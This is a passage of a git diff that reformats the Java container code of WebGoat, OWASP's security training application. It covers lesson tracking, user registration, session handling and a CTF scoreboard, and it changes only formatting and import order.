- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
  * @version $Id: $Id
@@ -39,60 +39,61 @@ import java.util.List;
 @Slf4j
 public class Course {
 
-    private List<Lesson> lessons;
+  private List<Lesson> lessons;
 
-    public Course(List<Lesson> lessons) {
-        this.lessons = lessons;
-    }
+  public Course(List<Lesson> lessons) {
+    this.lessons = lessons;
+  }
 
-    /**
-     * Gets the categories attribute of the Course object
-     *
-     * @return The categories value
-     */
-    public List<Category> getCategories() {
-        return lessons.parallelStream().map(Lesson::getCategory).distinct().sorted().toList();
-    }
+  /**
+   * Gets the categories attribute of the Course object
+   *
+   * @return The categories value
+   */
+  public List<Category> getCategories() {
+    return lessons.parallelStream().map(Lesson::getCategory).distinct().sorted().toList();
+  }
 
-    /**
-     * Gets the firstLesson attribute of the Course object
-     *
-     * @return The firstLesson value
-     */
-    public Lesson getFirstLesson() {
-        // Category 0 is the admin function. We want the first real category
-        // to be returned. This is normally the General category and the Http Basics lesson
-        return getLessons(getCategories().get(0)).get(0);
-    }
+  /**
+   * Gets the firstLesson attribute of the Course object
+   *
+   * @return The firstLesson value
+   */
+  public Lesson getFirstLesson() {
+    // Category 0 is the admin function. We want the first real category
+    // to be returned. This is normally the General category and the Http Basics lesson
+    return getLessons(getCategories().get(0)).get(0);
+  }
 
-    /**
-     * <p>Getter for the field <code>lessons</code>.</p>
-     *
-     * @return a {@link java.util.List} object.
-     */
-    public List<Lesson> getLessons() {
-        return this.lessons;
-    }
+  /**
+   * Getter for the field <code>lessons</code>.
+   *
+   * @return a {@link java.util.List} object.
+   */
+  public List<Lesson> getLessons() {
+    return this.lessons;
+  }
 
-    /**
-     * <p>Getter for the field <code>lessons</code>.</p>
-     *
-     * @param category a {@link org.owasp.webgoat.container.lessons.Category} object.
-     * @return a {@link java.util.List} object.
-     */
-    public List<Lesson> getLessons(Category category) {
-        return this.lessons.stream().filter(l -> l.getCategory() == category).toList();
-    }
+  /**
+   * Getter for the field <code>lessons</code>.
+   *
+   * @param category a {@link org.owasp.webgoat.container.lessons.Category} object.
+   * @return a {@link java.util.List} object.
+   */
+  public List<Lesson> getLessons(Category category) {
+    return this.lessons.stream().filter(l -> l.getCategory() == category).toList();
+  }
 
-    public void setLessons(List<Lesson> lessons) {
-        this.lessons = lessons;
-    }
+  public void setLessons(List<Lesson> lessons) {
+    this.lessons = lessons;
+  }
 
-    public int getTotalOfLessons() {
-        return this.lessons.size();
-    }
+  public int getTotalOfLessons() {
+    return this.lessons.size();
+  }
 
-    public int getTotalOfAssignments() {
-        return this.lessons.stream().reduce(0, (total, lesson) -> lesson.getAssignments().size() + total, Integer::sum);
-    }
+  public int getTotalOfAssignments() {
+    return this.lessons.stream()
+        .reduce(0, (total, lesson) -> lesson.getAssignments().size() + total, Integer::sum);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/session/LabelDebugger.java b/src/main/java/org/owasp/webgoat/container/session/LabelDebugger.java
index 69823e7b4..34e7b7111 100644
--- a/src/main/java/org/owasp/webgoat/container/session/LabelDebugger.java
+++ b/src/main/java/org/owasp/webgoat/container/session/LabelDebugger.java
@@ -3,44 +3,40 @@ package org.owasp.webgoat.container.session;
 import java.io.Serializable;
 
 /**
- * <p>LabelDebugger class.</p>
+ * LabelDebugger class.
  *
  * @author dm
  * @version $Id: $Id
  */
 public class LabelDebugger implements Serializable {
 
-    private boolean enabled = false;
+  private boolean enabled = false;
 
-    /**
-     * <p>isEnabled.</p>
-     *
-     * @return a boolean.
-     */
-    public boolean isEnabled() {
-        return enabled;
-    }
+  /**
+   * isEnabled.
+   *
+   * @return a boolean.
+   */
+  public boolean isEnabled() {
+    return enabled;
+  }
 
-    /**
-     * <p>Enables label debugging</p>
-     */
-    public void enable() {
-        this.enabled = true;
-    }
+  /** Enables label debugging */
+  public void enable() {
+    this.enabled = true;
+  }
 
-    /**
-     * <p>Disables label debugging</p>
-     */
-    public void disable() {
-        this.enabled = false;
-    }
-
-    /**
-     * <p>Sets the status to enabled</p>
-     * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
-     */
-    public void setEnabled(boolean enabled)  {
-        this.enabled = enabled;
-    }
+  /** Disables label debugging */
+  public void disable() {
+    this.enabled = false;
+  }
 
+  /**
+   * Sets the status to enabled
+   *
+   * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
+   */
+  public void setEnabled(boolean enabled) {
+    this.enabled = enabled;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/session/UserSessionData.java b/src/main/java/org/owasp/webgoat/container/session/UserSessionData.java
index 2e58caf0f..be55c3971 100644
--- a/src/main/java/org/owasp/webgoat/container/session/UserSessionData.java
+++ b/src/main/java/org/owasp/webgoat/container/session/UserSessionData.java
@@ -2,35 +2,31 @@ package org.owasp.webgoat.container.session;
 
 import java.util.HashMap;
 
-/**
- * Created by jason on 1/4/17.
- */
+/** Created by jason on 1/4/17. */
 public class UserSessionData {
 
-    private HashMap<String,Object> userSessionData = new HashMap<>();
+  private HashMap<String, Object> userSessionData = new HashMap<>();
 
-    public UserSessionData() {
+  public UserSessionData() {}
+
+  public UserSessionData(String key, String value) {
+    setValue(key, value);
+  }
+
+  // GETTERS & SETTERS
+  public Object getValue(String key) {
+    if (!userSessionData.containsKey(key)) {
+      return null;
     }
+    // else
+    return userSessionData.get(key);
+  }
 
-    public UserSessionData(String key, String value) {
-        setValue(key,value);
+  public void setValue(String key, Object value) {
+    if (userSessionData.containsKey(key)) {
+      userSessionData.replace(key, value);
+    } else {
+      userSessionData.put(key, value);
     }
-
-    //GETTERS & SETTERS
-    public Object getValue(String key) {
-        if (!userSessionData.containsKey(key)) {
-            return null;
-        }
-        // else
-        return userSessionData.get(key);
-    }
-
-    public void setValue(String key, Object value) {
-        if (userSessionData.containsKey(key)) {
-            userSessionData.replace(key,value);
-        } else {
-            userSessionData.put(key,value);
-        }
-    }
-
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/session/WebSession.java b/src/main/java/org/owasp/webgoat/container/session/WebSession.java
index f8b2296d2..22b339db6 100644
--- a/src/main/java/org/owasp/webgoat/container/session/WebSession.java
+++ b/src/main/java/org/owasp/webgoat/container/session/WebSession.java
@@ -1,34 +1,36 @@
 package org.owasp.webgoat.container.session;
 
+import java.io.Serializable;
 import org.owasp.webgoat.container.lessons.Lesson;
 import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.security.core.context.SecurityContextHolder;
 
-import java.io.Serializable;
-
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see
- * http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
- * License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
- * warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if not, write to the Free
- * Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
@@ -37,51 +39,52 @@ import java.io.Serializable;
  */
 public class WebSession implements Serializable {
 
-    private static final long serialVersionUID = -4270066103101711560L;
-    private final WebGoatUser currentUser;
-    private transient Lesson currentLesson;
-    private boolean securityEnabled;
+  private static final long serialVersionUID = -4270066103101711560L;
+  private final WebGoatUser currentUser;
+  private transient Lesson currentLesson;
+  private boolean securityEnabled;
 
-    public WebSession() {
-        this.currentUser = (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
-    }
+  public WebSession() {
+    this.currentUser =
+        (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
+  }
 
-    /**
-     * <p> Setter for the field <code>currentScreen</code>. </p>
-     *
-     * @param lesson current lesson
-     */
-    public void setCurrentLesson(Lesson lesson) {
-        this.currentLesson = lesson;
-    }
+  /**
+   * Setter for the field <code>currentScreen</code>.
+   *
+   * @param lesson current lesson
+   */
+  public void setCurrentLesson(Lesson lesson) {
+    this.currentLesson = lesson;
+  }
 
-    /**
-     * <p> getCurrentLesson. </p>
-     *
-     * @return a {@link Lesson} object.
-     */
-    public Lesson getCurrentLesson() {
-        return this.currentLesson;
-    }
+  /**
+   * getCurrentLesson.
+   *
+   * @return a {@link Lesson} object.
+   */
+  public Lesson getCurrentLesson() {
+    return this.currentLesson;
+  }
 
-    /**
-     * Gets the userName attribute of the WebSession object
-     *
-     * @return The userName value
-     */
-    public String getUserName() {
-        return currentUser.getUsername();
-    }
+  /**
+   * Gets the userName attribute of the WebSession object
+   *
+   * @return The userName value
+   */
+  public String getUserName() {
+    return currentUser.getUsername();
+  }
 
-    public WebGoatUser getUser() {
-        return currentUser;
-    }
+  public WebGoatUser getUser() {
+    return currentUser;
+  }
 
-    public void toggleSecurity() {
-        this.securityEnabled = !this.securityEnabled;
-    }
+  public void toggleSecurity() {
+    this.securityEnabled = !this.securityEnabled;
+  }
 
-    public boolean isSecurityEnabled() {
-        return securityEnabled;
-    }
+  public boolean isSecurityEnabled() {
+    return securityEnabled;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/LessonTracker.java b/src/main/java/org/owasp/webgoat/container/users/LessonTracker.java
index ab882c29a..2cc0c58af 100644
--- a/src/main/java/org/owasp/webgoat/container/users/LessonTracker.java
+++ b/src/main/java/org/owasp/webgoat/container/users/LessonTracker.java
@@ -1,40 +1,38 @@
-
 package org.owasp.webgoat.container.users;
 
-import lombok.Getter;
-import org.owasp.webgoat.container.lessons.Lesson;
-import org.owasp.webgoat.container.lessons.Assignment;
-
-import javax.persistence.*;
 import java.util.*;
 import java.util.stream.Collectors;
-
+import javax.persistence.*;
+import lombok.Getter;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Lesson;
 
 /**
  * ************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
  * @version $Id: $Id
@@ -43,72 +41,69 @@ import java.util.stream.Collectors;
 @Entity
 public class LessonTracker {
 
-    @Id
-    @GeneratedValue(strategy = GenerationType.AUTO)
-    private Long id;
-    @Getter
-    private String lessonName;
-    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
-    private final Set<Assignment> solvedAssignments = new HashSet<>();
-    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
-    private final Set<Assignment> allAssignments = new HashSet<>();
-    @Getter
-    private int numberOfAttempts = 0;
-    @Version
-    private Integer version;
+  @Id
+  @GeneratedValue(strategy = GenerationType.AUTO)
+  private Long id;
 
-    private LessonTracker() {
-        //JPA
-    }
+  @Getter private String lessonName;
 
-    public LessonTracker(Lesson lesson) {
-        lessonName = lesson.getId();
-        allAssignments.addAll(lesson.getAssignments() == null ? List.of() : lesson.getAssignments());
-    }
+  @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
+  private final Set<Assignment> solvedAssignments = new HashSet<>();
 
-    public Optional<Assignment> getAssignment(String name) {
-        return allAssignments.stream().filter(a -> a.getName().equals(name)).findFirst();
-    }
+  @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
+  private final Set<Assignment> allAssignments = new HashSet<>();
 
-    /**
-     * Mark an assignment as solved
-     *
-     * @param solvedAssignment the assignment which the user solved
-     */
-    public void assignmentSolved(String solvedAssignment) {
-        getAssignment(solvedAssignment).ifPresent(solvedAssignments::add);
-    }
+  @Getter private int numberOfAttempts = 0;
+  @Version private Integer version;
 
-    /**
-     * @return did they user solved all solvedAssignments for the lesson?
-     */
-    public boolean isLessonSolved() {
-        return allAssignments.size() == solvedAssignments.size();
-    }
+  private LessonTracker() {
+    // JPA
+  }
 
-    /**
-     * Increase the number attempts to solve the lesson
-     */
-    public void incrementAttempts() {
-        numberOfAttempts++;
-    }
+  public LessonTracker(Lesson lesson) {
+    lessonName = lesson.getId();
+    allAssignments.addAll(lesson.getAssignments() == null ? List.of() : lesson.getAssignments());
+  }
 
-    /**
-     * Reset the tracker. We do not reset the number of attempts here!
-     */
-    void reset() {
-        solvedAssignments.clear();
-    }
+  public Optional<Assignment> getAssignment(String name) {
+    return allAssignments.stream().filter(a -> a.getName().equals(name)).findFirst();
+  }
 
-    /**
-     * @return list containing all the assignments solved or not
-     */
-    public Map<Assignment, Boolean> getLessonOverview() {
-        List<Assignment> notSolved = allAssignments.stream()
-                .filter(i -> !solvedAssignments.contains(i))
-                .toList();
-        Map<Assignment, Boolean> overview = notSolved.stream().collect(Collectors.toMap(a -> a, b -> false));
-        overview.putAll(solvedAssignments.stream().collect(Collectors.toMap(a -> a, b -> true)));
-        return overview;
-    }
+  /**
+   * Mark an assignment as solved
+   *
+   * @param solvedAssignment the assignment which the user solved
+   */
+  public void assignmentSolved(String solvedAssignment) {
+    getAssignment(solvedAssignment).ifPresent(solvedAssignments::add);
+  }
+
+  /**
+   * @return did they user solved all solvedAssignments for the lesson?
+   */
+  public boolean isLessonSolved() {
+    return allAssignments.size() == solvedAssignments.size();
+  }
+
+  /** Increase the number attempts to solve the lesson */
+  public void incrementAttempts() {
+    numberOfAttempts++;
+  }
+
+  /** Reset the tracker. We do not reset the number of attempts here! */
+  void reset() {
+    solvedAssignments.clear();
+  }
+
+  /**
+   * @return list containing all the assignments solved or not
+   */
+  public Map<Assignment, Boolean> getLessonOverview() {
+    List<Assignment> notSolved =
+        allAssignments.stream().filter(i -> !solvedAssignments.contains(i)).toList();
+    Map<Assignment, Boolean> overview =
+        notSolved.stream().collect(Collectors.toMap(a -> a, b -> false));
+    overview.putAll(solvedAssignments.stream().collect(Collectors.toMap(a -> a, b -> true)));
+    return overview;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/RegistrationController.java b/src/main/java/org/owasp/webgoat/container/users/RegistrationController.java
index d3d645796..4dc628f86 100644
--- a/src/main/java/org/owasp/webgoat/container/users/RegistrationController.java
+++ b/src/main/java/org/owasp/webgoat/container/users/RegistrationController.java
@@ -1,5 +1,8 @@
 package org.owasp.webgoat.container.users;
 
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.validation.Valid;
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.security.authentication.AuthenticationManager;
@@ -9,10 +12,6 @@ import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.ModelAttribute;
 import org.springframework.web.bind.annotation.PostMapping;
 
-import javax.servlet.ServletException;
-import javax.servlet.http.HttpServletRequest;
-import javax.validation.Valid;
-
 /**
  * @author nbaars
  * @since 3/19/17.
@@ -22,25 +21,29 @@ import javax.validation.Valid;
 @Slf4j
 public class RegistrationController {
 
-    private UserValidator userValidator;
-    private UserService userService;
-    private AuthenticationManager authenticationManager;
+  private UserValidator userValidator;
+  private UserService userService;
+  private AuthenticationManager authenticationManager;
 
-    @GetMapping("/registration")
-    public String showForm(UserForm userForm) {
-        return "registration";
+  @GetMapping("/registration")
+  public String showForm(UserForm userForm) {
+    return "registration";
+  }
+
+  @PostMapping("/register.mvc")
+  public String registration(
+      @ModelAttribute("userForm") @Valid UserForm userForm,
+      BindingResult bindingResult,
+      HttpServletRequest request)
+      throws ServletException {
+    userValidator.validate(userForm, bindingResult);
+
+    if (bindingResult.hasErrors()) {
+      return "registration";
     }
+    userService.addUser(userForm.getUsername(), userForm.getPassword());
+    request.login(userForm.getUsername(), userForm.getPassword());
 
-    @PostMapping("/register.mvc")
-    public String registration(@ModelAttribute("userForm") @Valid UserForm userForm, BindingResult bindingResult, HttpServletRequest request) throws ServletException {
-        userValidator.validate(userForm, bindingResult);
-
-        if (bindingResult.hasErrors()) {
-            return "registration";
-        }
-        userService.addUser(userForm.getUsername(), userForm.getPassword());
-        request.login(userForm.getUsername(), userForm.getPassword());
-
-        return "redirect:/attack";
-    }
+    return "redirect:/attack";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/Scoreboard.java b/src/main/java/org/owasp/webgoat/container/users/Scoreboard.java
index 6eb2e6508..2f5ddefe2 100644
--- a/src/main/java/org/owasp/webgoat/container/users/Scoreboard.java
+++ b/src/main/java/org/owasp/webgoat/container/users/Scoreboard.java
@@ -1,5 +1,8 @@
 package org.owasp.webgoat.container.users;
 
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Optional;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import org.owasp.webgoat.container.i18n.PluginMessages;
@@ -8,10 +11,6 @@ import org.owasp.webgoat.container.session.Course;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.ArrayList;
-import java.util.List;
-import java.util.Optional;
-
 /**
  * Temp endpoint just for the CTF.
  *
@@ -22,52 +21,63 @@ import java.util.Optional;
 @AllArgsConstructor
 public class Scoreboard {
 
-    private final UserTrackerRepository userTrackerRepository;
-    private final UserRepository userRepository;
-    private final Course course;
-    private final PluginMessages pluginMessages;
+  private final UserTrackerRepository userTrackerRepository;
+  private final UserRepository userRepository;
+  private final Course course;
+  private final PluginMessages pluginMessages;
 
-    @AllArgsConstructor
-    @Getter
-    private class Ranking {
-        private String username;
-        private List<String> flagsCaptured;
-    }
+  @AllArgsConstructor
+  @Getter
+  private class Ranking {
+    private String username;
+    private List<String> flagsCaptured;
+  }
 
-    @GetMapping("/scoreboard-data")
-    public List<Ranking> getRankings() {
-        List<WebGoatUser> allUsers = userRepository.findAll();
-        List<Ranking> rankings = new ArrayList<>();
-        for (WebGoatUser user : allUsers) {
-            if (user.getUsername().startsWith("csrf-")) {
-                //the csrf- assignment specific users do not need to be in the overview
-                continue;
-            }
-            UserTracker userTracker = userTrackerRepository.findByUser(user.getUsername());
-            rankings.add(new Ranking(user.getUsername(), challengesSolved(userTracker)));
-        }
-        /* sort on number of captured flags to present an ordered ranking */
-        rankings.sort((o1, o2) -> o2.getFlagsCaptured().size() - o1.getFlagsCaptured().size());
-        return rankings;
+  @GetMapping("/scoreboard-data")
+  public List<Ranking> getRankings() {
+    List<WebGoatUser> allUsers = userRepository.findAll();
+    List<Ranking> rankings = new ArrayList<>();
+    for (WebGoatUser user : allUsers) {
+      if (user.getUsername().startsWith("csrf-")) {
+        // the csrf- assignment specific users do not need to be in the overview
+        continue;
+      }
+      UserTracker userTracker = userTrackerRepository.findByUser(user.getUsername());
+      rankings.add(new Ranking(user.getUsername(), challengesSolved(userTracker)));
     }
+    /* sort on number of captured flags to present an ordered ranking */
+    rankings.sort((o1, o2) -> o2.getFlagsCaptured().size() - o1.getFlagsCaptured().size());
+    return rankings;
+  }
 
-    private List<String> challengesSolved(UserTracker userTracker) {
-        List<String> challenges = List.of("Challenge1", "Challenge2", "Challenge3", "Challenge4", "Challenge5", "Challenge6", "Challenge7", "Challenge8", "Challenge9");
-        return challenges.stream()
-                .map(userTracker::getLessonTracker)
-                .flatMap(Optional::stream)
-                .filter(LessonTracker::isLessonSolved)
-                .map(LessonTracker::getLessonName)
-                .map(this::toLessonTitle)
-                .toList();
-    }
+  private List<String> challengesSolved(UserTracker userTracker) {
+    List<String> challenges =
+        List.of(
+            "Challenge1",
+            "Challenge2",
+            "Challenge3",
+            "Challenge4",
+            "Challenge5",
+            "Challenge6",
+            "Challenge7",
+            "Challenge8",
+            "Challenge9");
+    return challenges.stream()
+        .map(userTracker::getLessonTracker)
+        .flatMap(Optional::stream)
+        .filter(LessonTracker::isLessonSolved)
+        .map(LessonTracker::getLessonName)
+        .map(this::toLessonTitle)
+        .toList();
+  }
 
-    private String toLessonTitle(String id) {
-        String titleKey = course.getLessons().stream()
-                .filter(l -> l.getId().equals(id))
-                .findFirst()
-                .map(Lesson::getTitle)
-                .orElse("No title");
-        return pluginMessages.getMessage(titleKey, titleKey);
-    }
+  private String toLessonTitle(String id) {
+    String titleKey =
+        course.getLessons().stream()
+            .filter(l -> l.getId().equals(id))
+            .findFirst()
+            .map(Lesson::getTitle)
+            .orElse("No title");
+    return pluginMessages.getMessage(titleKey, titleKey);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/UserForm.java b/src/main/java/org/owasp/webgoat/container/users/UserForm.java
index 2cc73ba62..416bba094 100644
--- a/src/main/java/org/owasp/webgoat/container/users/UserForm.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserForm.java
@@ -1,11 +1,10 @@
 package org.owasp.webgoat.container.users;
 
-import lombok.Getter;
-import lombok.Setter;
-
 import javax.validation.constraints.NotNull;
 import javax.validation.constraints.Pattern;
 import javax.validation.constraints.Size;
+import lombok.Getter;
+import lombok.Setter;
 
 /**
  * @author nbaars
@@ -15,16 +14,18 @@ import javax.validation.constraints.Size;
 @Setter
 public class UserForm {
 
-    @NotNull
-    @Size(min = 6, max = 45)
-    @Pattern(regexp = "[a-z0-9-]*", message = "can only contain lowercase letters, digits, and -")
-    private String username;
-    @NotNull
-    @Size(min = 6, max = 10)
-    private String password;
-    @NotNull
-    @Size(min = 6, max = 10)
-    private String matchingPassword;
-    @NotNull
-    private String agree;
+  @NotNull
+  @Size(min = 6, max = 45)
+  @Pattern(regexp = "[a-z0-9-]*", message = "can only contain lowercase letters, digits, and -")
+  private String username;
+
+  @NotNull
+  @Size(min = 6, max = 10)
+  private String password;
+
+  @NotNull
+  @Size(min = 6, max = 10)
+  private String matchingPassword;
+
+  @NotNull private String agree;
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/UserRepository.java b/src/main/java/org/owasp/webgoat/container/users/UserRepository.java
index 322ff8e66..86d9b2cd4 100644
--- a/src/main/java/org/owasp/webgoat/container/users/UserRepository.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserRepository.java
@@ -1,8 +1,7 @@
 package org.owasp.webgoat.container.users;
 
-import org.springframework.data.jpa.repository.JpaRepository;
-
 import java.util.List;
+import org.springframework.data.jpa.repository.JpaRepository;
 
 /**
  * @author nbaars
@@ -10,10 +9,9 @@ import java.util.List;
  */
 public interface UserRepository extends JpaRepository<WebGoatUser, String> {
 
-    WebGoatUser findByUsername(String username);
+  WebGoatUser findByUsername(String username);
 
-    List<WebGoatUser> findAll();
-
-    boolean existsByUsername(String username);
+  List<WebGoatUser> findAll();
 
+  boolean existsByUsername(String username);
 }
diff --git a/src/main/java/org/owasp/webgoat/container/users/UserService.java b/src/main/java/org/owasp/webgoat/container/users/UserService.java
index a2b7566fe..e12668f00 100644
--- a/src/main/java/org/owasp/webgoat/container/users/UserService.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserService.java
@@ -1,5 +1,7 @@
 package org.owasp.webgoat.container.users;
 
+import java.util.List;
+import java.util.function.Function;
 import lombok.AllArgsConstructor;
 import org.flywaydb.core.Flyway;
 import org.owasp.webgoat.container.lessons.Initializeable;
@@ -8,9 +10,6 @@ import org.springframework.security.core.userdetails.UserDetailsService;
 import org.springframework.security.core.userdetails.UsernameNotFoundException;
 import org.springframework.stereotype.Service;
 
-import java.util.List;
-import java.util.function.Function;
-
 /**
  * @author nbaars
  * @since 3/19/17.
@@ -19,42 +18,42 @@ import java.util.function.Function;
 @AllArgsConstructor
 public class UserService implements UserDetailsService {
 
-    private final UserRepository userRepository;
-    private final UserTrackerRepository userTrackerRepository;
-    private final JdbcTemplate jdbcTemplate;
-    private final Function<String, Flyway> flywayLessons;
-    private final List<Initializeable> lessonInitializables;
+  private final UserRepository userRepository;
+  private final UserTrackerRepository userTrackerRepository;
+  private final JdbcTemplate jdbcTemplate;
+  private final Function<String, Flyway> flywayLessons;
+  private final List<Initializeable> lessonInitializables;
 
-    @Override
-    public WebGoatUser loadUserByUsername(String username) throws UsernameNotFoundException {
-        WebGoatUser webGoatUser = userRepository.findByUsername(username);
-        if (webGoatUser == null) {
-            throw new UsernameNotFoundException("User not found");
-        } else {
-            webGoatUser.createUser();
-            lessonInitializables.forEach(l -> l.initialize(webGoatUser));
-        }
-        return webGoatUser;
+  @Override
+  public WebGoatUser loadUserByUsername(String username) throws UsernameNotFoundException {
+    WebGoatUser webGoatUser = userRepository.findByUsername(username);
+    if (webGoatUser == null) {
+      throw new UsernameNotFoundException("User not found");
+    } else {
+      webGoatUser.createUser();
+      lessonInitializables.forEach(l -> l.initialize(webGoatUser));
     }
+    return webGoatUser;
+  }
 
-    public void addUser(String username, String password) {
-        //get user if there exists one by the name
-        var userAlreadyExists = userRepository.existsByUsername(username);
-        var webGoatUser = userRepository.save(new WebGoatUser(username, password));
+  public void addUser(String username, String password) {
+    // get user if there exists one by the name
+    var userAlreadyExists = userRepository.existsByUsername(username);
+    var webGoatUser = userRepository.save(new WebGoatUser(username, password));
 
-        if (!userAlreadyExists) {
-            userTrackerRepository.save(new UserTracker(username)); //if user previously existed it will not get another tracker
-            createLessonsForUser(webGoatUser);
-        }
+    if (!userAlreadyExists) {
+      userTrackerRepository.save(
+          new UserTracker(username)); // if user previously existed it will not get another tracker
+      createLessonsForUser(webGoatUser);
     }
+  }
 
-    private void createLessonsForUser(WebGoatUser webGoatUser) {
-        jdbcTemplate.execute("CREATE SCHEMA \"" + webGoatUser.getUsername() + "\" authorization dba");
-        flywayLessons.apply(webGoatUser.getUsername()).migrate();
-    }
-
-    public List<WebGoatUser> getAllUsers() {
-        return userRepository.findAll();
-    }
+  private void createLessonsForUser(WebGoatUser webGoatUser) {
+    jdbcTemplate.execute("CREATE SCHEMA \"" + webGoatUser.getUsername() + "\" authorization dba");
+    flywayLessons.apply(webGoatUser.getUsername()).migrate();
+  }
 
+  public List<WebGoatUser> getAllUsers() {
+    return userRepository.findAll();
+  }
 }
